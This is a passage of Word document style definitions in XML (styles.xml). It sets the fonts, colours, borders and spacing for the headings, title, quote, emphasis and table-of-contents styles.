    <w:rsid w:val="00CB1173"/>
    <w:rsid w:val="00D31FEB"/>
    <w:rsid w:val="00E3087E"/>
    <w:rsid w:val="00EA3795"/>
    <w:rsid w:val="00EA669F"/>
    <w:rsid w:val="00FB2DFF"/>
    <w:rsid w:val="00FF5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ABA0E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u" w:eastAsia="ja-JP" w:bidi="hu"/>
      </w:rPr>
    </w:rPrDefault>
    <w:pPrDefault>
      <w:pPr>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3CC"/>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/>
      <w:lang w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="003C43CC"/>
    <w:pPr>
      <w:pBdr>
        <w:bottom w:val="single" w:sz="12" w:space="1" w:color="005494" w:themeColor="accent1" w:themeShade="BF"/>
      </w:pBdr>
      <w:spacing w:before="600" w:after="80"/>
      <w:ind w:firstLine="0"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="005494" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading2Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="003C43CC"/>
    <w:pPr>
      <w:pBdr>
        <w:bottom w:val="single" w:sz="8" w:space="1" w:color="0072C6" w:themeColor="accent1"/>
      </w:pBdr>
      <w:spacing w:before="200" w:after="80"/>
      <w:ind w:firstLine="0"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi"/>
      <w:color w:val="005494" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading3Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="003C43CC"/>
    <w:pPr>
      <w:pBdr>
        <w:bottom w:val="single" w:sz="4" w:space="1" w:color="43AEFF" w:themeColor="accent1" w:themeTint="99"/>
      </w:pBdr>
      <w:spacing w:before="200" w:after="80"/>
      <w:ind w:firstLine="0"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi"/>
      <w:color w:val="0072C6" w:themeColor="accent1"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading4Char"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="003C43CC"/>
    <w:pPr>
      <w:pBdr>
        <w:bottom w:val="single" w:sz="4" w:space="2" w:color="82C9FF" w:themeColor="accent1" w:themeTint="66"/>
      </w:pBdr>
      <w:spacing w:before="200" w:after="80"/>
      <w:ind w:firstLine="0"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0072C6" w:themeColor="accent1"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading5">
    <w:name w:val="heading 5"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading5Char"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="003C43CC"/>
    <w:pPr>
      <w:spacing w:before="200" w:after="80"/>
      <w:ind w:firstLine="0"/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi"/>
      <w:color w:val="0072C6" w:themeColor="accent1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading6">
    <w:name w:val="heading 6"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading6Char"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="003C43CC"/>
    <w:pPr>
      <w:spacing w:before="280" w:after="100"/>
      <w:ind w:firstLine="0"/>
      <w:outlineLvl w:val="5"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0072C6" w:themeColor="accent1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading7">
    <w:name w:val="heading 7"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading7Char"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="003C43CC"/>
    <w:pPr>
      <w:spacing w:before="320" w:after="100"/>
      <w:ind w:firstLine="0"/>
      <w:outlineLvl w:val="6"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="DC3C00" w:themeColor="accent3"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading8">
    <w:name w:val="heading 8"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading8Char"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="003C43CC"/>
    <w:pPr>
      <w:spacing w:before="320" w:after="100"/>
      <w:ind w:firstLine="0"/>
      <w:outlineLvl w:val="7"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi"/>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="DC3C00" w:themeColor="accent3"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading9">
    <w:name w:val="heading 9"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading9Char"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="003C43CC"/>
    <w:pPr>
      <w:spacing w:before="320" w:after="100"/>
      <w:ind w:firstLine="0"/>
      <w:outlineLvl w:val="8"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="DC3C00"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qFormat/>
    <w:rsid w:val="003C43CC"/>
    <w:pPr>
      <w:pBdr>
        <w:top w:val="single" w:sz="8" w:space="10" w:color="63BCFF" w:themeColor="accent1" w:themeTint="7F"/>
        <w:bottom w:val="single" w:sz="24" w:space="15" w:color="DC3C00" w:themeColor="accent3"/>
      </w:pBdr>
      <w:ind w:firstLine="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="003862" w:themeColor="accent1" w:themeShade="7F"/>
      <w:sz w:val="60"/>
      <w:szCs w:val="60"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="TitleChar">
    <w:name w:val="Title Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Title"/>
    <w:uiPriority w:val="10"/>
    <w:rsid w:val="003C43CC"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cs="Times New Roman"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="003862" w:themeColor="accent1" w:themeShade="7F"/>
      <w:sz w:val="60"/>
      <w:szCs w:val="60"/>
      <w:lang w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Subtitle">
    <w:name w:val="Subtitle"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="SubtitleChar"/>
    <w:uiPriority w:val="11"/>
    <w:qFormat/>
    <w:rsid w:val="003C43CC"/>
    <w:pPr>
      <w:spacing w:before="200" w:after="900"/>
      <w:ind w:firstLine="0"/>
      <w:jc w:val="right"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading1Char">
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="003C43CC"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="005494" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="003C43CC"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cs="Times New Roman"/>
      <w:color w:val="005494" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListBullet">
    <w:name w:val="List Bullet"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="31"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="8"/>
      </w:numPr>
      <w:contextualSpacing/>
    </w:p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qFormat/>
    <w:rsid w:val="003C43CC"/>
    <w:pPr>
      <w:pBdr>
        <w:top w:val="single" w:sz="12" w:space="10" w:color="82C9FF" w:themeColor="accent1" w:themeTint="66"/>
        <w:left w:val="single" w:sz="36" w:space="4" w:color="0072C6" w:themeColor="accent1"/>
        <w:bottom w:val="single" w:sz="24" w:space="10" w:color="DC3C00" w:themeColor="accent3"/>
        <w:right w:val="single" w:sz="36" w:space="4" w:color="0072C6" w:themeColor="accent1"/>
      </w:pBdr>
      <w:shd w:val="clear" w:color="auto" w:fill="0072C6" w:themeFill="accent1"/>
      <w:spacing w:before="320" w:after="320" w:line="300" w:lineRule="auto"/>
      <w:ind w:left="1440" w:right="1440"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="FFFFFF" w:themeColor="background1"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>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usinessPaper">
    <w:name w:val="Business Paper"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:before="240" w:after="180"/>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rsid w:val="003C43CC"/>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading7Char">
    <w:name w:val="Heading 7 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading7"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="003C43CC"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="DC3C00" w:themeColor="accent3"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading8Char">
    <w:name w:val="Heading 8 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading8"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="003C43CC"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="DC3C00" w:themeColor="accent3"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading9Char">
    <w:name w:val="Heading 9 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading9"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="003C43CC"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cs="Times New Roman"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="DC3C00" w:themeColor="accent3"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="SubtleEmphasis">
    <w:name w:val="Subtle Emphasis"/>
    <w:uiPriority w:val="19"/>
    <w:qFormat/>
    <w:rsid w:val="003C43CC"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="5A5A5A" w:themeColor="text1" w:themeTint="A5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Emphasis">
    <w:name w:val="Emphasis"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="003C43CC"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="5A5A5A" w:themeColor="text1" w:themeTint="A5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="003C43CC"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0072C6" w:themeColor="accent1"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="003C43CC"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:spacing w:val="0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="SubtleReference">
    <w:name w:val="Subtle Reference"/>
    <w:uiPriority w:val="31"/>
    <w:qFormat/>
    <w:rsid w:val="003C43CC"/>
    <w:rPr>
      <w:color w:val="auto"/>
      <w:u w:val="single" w:color="DC3C00" w:themeColor="accent3"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="003C43CC"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="A42C00" w:themeColor="accent3" w:themeShade="BF"/>
      <w:u w:val="single" w:color="DC3C00" w:themeColor="accent3"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="BookTitle">
    <w:name w:val="Book Title"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="33"/>
    <w:qFormat/>
    <w:rsid w:val="003C43CC"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="auto"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Caption">
    <w:name w:val="caption"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="35"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="003C43CC"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOCHeading">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="Heading1"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="003C43CC"/>
    <w:pPr>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cstheme="majorBidi"/>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qFormat/>
    <w:rsid w:val="003C43CC"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="5A5A5A" w:themeColor="text1" w:themeTint="A5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="003C43CC"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cs="Times New Roman"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="5A5A5A" w:themeColor="text1" w:themeTint="A5"/>
      <w:lang w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="IntenseQuoteChar">
    <w:name w:val="Intense Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="IntenseQuote"/>
    <w:uiPriority w:val="30"/>
    <w:rsid w:val="003C43CC"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cs="Times New Roman"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="FFFFFF" w:themeColor="background1"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:shd w:val="clear" w:color="auto" w:fill="0072C6" w:themeFill="accent1"/>
      <w:lang w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading3Char">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading3"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="003C43CC"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cs="Times New Roman"/>
      <w:color w:val="0072C6" w:themeColor="accent1"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListNumber">
    <w:name w:val="List Number"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="32"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="7"/>
      </w:numPr>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading6Char">
    <w:name w:val="Heading 6 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading6"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="003C43CC"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cs="Times New Roman"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0072C6" w:themeColor="accent1"/>
      <w:lang w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NoSpacing">
    <w:name w:val="No Spacing"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="NoSpacingChar"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="003C43CC"/>
    <w:pPr>
      <w:ind w:firstLine="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cstheme="majorBidi"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="NoSpacingChar">
    <w:name w:val="No Spacing Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="NoSpacing"/>
    <w:uiPriority w:val="1"/>
    <w:rsid w:val="003C43CC"/>
    <w:rPr>
      <w:rFonts w:cstheme="majorBidi"/>
      <w:lang w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="003C43CC"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading4Char">
    <w:name w:val="Heading 4 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading4"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="003C43CC"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cs="Times New Roman"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0072C6" w:themeColor="accent1"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading5Char">
    <w:name w:val="Heading 5 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading5"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="003C43CC"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cs="Times New Roman"/>
      <w:color w:val="0072C6" w:themeColor="accent1"/>
      <w:lang w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="PersonalName">
    <w:name w:val="Personal Name"/>
    <w:basedOn w:val="Title"/>
    <w:rsid w:val="00B9598D"/>
    <w:rPr>
      <w:rFonts w:cstheme="majorBidi"/>
      <w:b/>
      <w:caps/>
      <w:color w:val="000000"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005420D1"/>
    <w:rPr>
      <w:color w:val="0072C6" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00522848"/>
    <w:pPr>
      <w:spacing w:before="120"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cstheme="minorHAnsi"/>
      <w:b/>
      <w:bCs/>
      <w:caps/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00522848"/>
    <w:pPr>
      <w:ind w:left="220"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cstheme="minorHAnsi"/>
      <w:smallCaps/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00522848"/>
    <w:pPr>
      <w:ind w:left="440"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cstheme="minorHAnsi"/>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC4">
    <w:name w:val="toc 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00522848"/>
    <w:pPr>
      <w:ind w:left="660"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cstheme="minorHAnsi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC5">
    <w:name w:val="toc 5"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00522848"/>
    <w:pPr>
      <w:ind w:left="880"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cstheme="minorHAnsi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC6">
    <w:name w:val="toc 6"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00522848"/>
    <w:pPr>
      <w:ind w:left="1100"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cstheme="minorHAnsi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC7">
    <w:name w:val="toc 7"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00522848"/>
    <w:pPr>
      <w:ind w:left="1320"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cstheme="minorHAnsi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC8">
    <w:name w:val="toc 8"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
